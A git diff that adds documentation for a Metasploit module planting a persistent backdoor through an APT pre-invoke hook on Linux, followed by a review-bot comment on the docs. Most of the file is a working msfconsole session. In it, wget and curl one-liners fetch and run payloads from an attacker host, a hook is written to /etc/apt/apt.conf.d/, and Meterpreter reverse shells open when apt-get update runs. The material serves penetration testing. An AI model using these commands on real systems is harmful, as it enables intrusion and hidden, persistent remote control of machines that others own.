138 changes: 138 additions & 0 deletions documentation/modules/exploit/linux/persistence/apt_package_manager.md
@@ -0,0 +1,138 @@
## Vulnerable Application

This module will run a payload when the apt package manager is used.
This module creates a pre-invoke hook for APT in `apt.conf.d`.
The hook name syntax is numeric followed by text.

Verified on Ubuntu 22.04

## Verification Steps

1. Exploit a box that uses APT
2. Obtain root persmissions, or enough permissions to edit the `apt.conf.d` folder
3. `use exploit/linux/persistence/apt_package_manager`
4. `set SESSION <id>`
5. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
6. `exploit`

When the system runs `apt-get update` the payload will launch.

## Options

### PAYLOAD_NAME

Name of backdoor executable. Defaults to a random name

### HOOKNAME

Name of pre-invoke hook to be installed in `/etc/apt/apt.conf.d/`. Pre-invoke hook name syntax is numeric followed by text.

## Scenarios

### Tested on Ubuntu 22.04

Initial access vector via web delivery

```
$ ./msfconsole -q
[*] Processing /root/.msf4/msfconsole.rc for ERB directives.
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Z73D1DUW --no-check-certificate http://111.111.1.111:8181/l; chmod +x Z73D1DUW; ./Z73D1DUW& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) >
[*] 222.222.2.22 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.22:51076) at 2025-02-04 17:40:52 -0500
sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/linux root @ 222.222.2.22 111.111.1.111:4545 -> 222.222.2.22:51076 (222.222.2.22)
```

Persistence

```
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/apt_package_manager
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > check
[*] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
[msf](Jobs:1 Agents:1) exploit(linux/persistence/apt_package_manager) > exploit
[*] Command to run on remote host: curl -so ./xTOLdQoOTv http://111.111.1.111:8080/Hg3DGEu9GqlWD06kh4AzFg;chmod +x ./xTOLdQoOTv;./xTOLdQoOTv&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) >
[*] Fetch handler listening on 111.111.1.111:8080
[*] HTTP server started
[*] Adding resource /Hg3DGEu9GqlWD06kh4AzFg
[*] Started reverse TCP handler on 111.111.1.111:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. /etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.
[*] Attempting to write hook:
[*] Wrote /etc/apt/apt.conf.d/76skoGqswo
[*] Backdoor uploaded /tmp/erNOJV96u
[+] Backdoor will run on next APT update
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc
[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/script/web_delivery linux/x64/meterpreter/reverse_tcp tcp://111.111.1.111:4545
1 Exploit: linux/persistence/apt_package_manager cmd/linux/http/x64/meterpreter/reverse_tcp tcp://111.111.1.111:4444
[msf](Jobs:2 Agents:1) exploit(linux/persistence/apt_package_manager) >
```

Run `sudo apt-get update` on the target.

```
[*] Client 222.222.2.22 requested /Hg3DGEu9GqlWD06kh4AzFg
[*] Sending payload to 222.222.2.22 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.22
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.22:49804) at 2025-02-04 17:43:06 -0500
[msf](Jobs:2 Agents:2) exploit(linux/persistence/apt_package_manager) > sessions -i 2
[*] Starting interaction with 2...
(Meterpreter 2)(/tmp) > sysinfo
Computer : 222.222.2.22
OS : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
(Meterpreter 2)(/tmp) >
```

#### Cleanup

```
(Meterpreter 2)(/tmp) > resource /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc
[*] Processing /root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc for ERB directives.
resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /etc/apt/apt.conf.d/76skoGqswo
resource (/root/.msf4/logs/persistence/222.222.2.22_20250204.4245/222.222.2.22_20250204.4245.rc)> rm /tmp/erNOJV96u
```
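Review bot: the Verification Steps and Options sections leave out requirements that the scenario output shows the module actually enforces. Step 2 asks only for permission to edit `apt.conf.d`, but the check message `/etc/apt/apt.conf.d/ and /tmp/ are writable, also found apt-get.` shows the module also needs a writable `/tmp/` (where `Backdoor uploaded /tmp/erNOJV96u` lands) and `apt-get` on PATH, so step 2 should list all three. PAYLOAD_NAME documents the executable's name but not that it is written to `/tmp/`, and HOOKNAME states the "numeric followed by text" rule without saying what the module does with a name that does not follow it. The text also describes the hook only as a "pre-invoke hook" while the trigger is stated as `apt-get update` ("Backdoor will run on next APT update"); naming the exact APT configuration directive the module writes would tell readers which apt operations fire the hook. Minor: "persmissions" in step 2, and "Cleaup" in the module's RC-file message on the `Meterpreter-compatible Cleaup RC file:` line is a typo in the module itself.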
103 changes: 0 additions & 103 deletions modules/exploits/linux/local/apt_package_manager_persistence.rb

This file was deleted.
